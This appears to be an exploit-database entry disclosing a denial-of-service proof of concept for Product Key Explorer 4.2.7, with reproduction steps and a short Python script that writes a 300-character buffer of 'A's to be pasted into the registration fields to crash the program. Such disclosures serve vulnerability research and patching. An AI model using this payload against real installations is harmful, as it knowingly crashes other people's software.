Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)

vendor:

Product Key Explorer

by:

Sinem Sahin

N/A

CVSS

N/A

Denial of Service

CWE

Product Name: Product Key Explorer

Affected Version From: 4.2.2007

Affected Version To: 4.2.2007

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 x64

2021

Product Key Explorer 4.2.7 – ‘multiple’ Denial of Service (PoC)

This exploit causes a denial of service in Product Key Explorer 4.2.7 by creating a payload.txt file with a buffer of 'A' characters.

Mitigation:

Unknown

Source

Exploit-DB raw data:

# Exploit Title: Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
# Exploit Author : Sinem Şahin
# Exploit Date: 2021-02-23
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Version: 4.2.7
# Tested on: Windows 7 x64


# Steps: 
1- Run the python script. (exploit.py)
2- Open payload.txt and copy content to clipboard.
3- Run 'Product Key Explorer 4.2.7'. 
4- Register -> Enter Registration Code
5- Paste clipboard into the "Key" or "Name".
6- Click on OK.
7- Crashed.

---> exploit.py <--

#!/usr/bin/env python
buffer = "\x41" * 300

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print "File created!"
except:
    print "File cannot be created!!"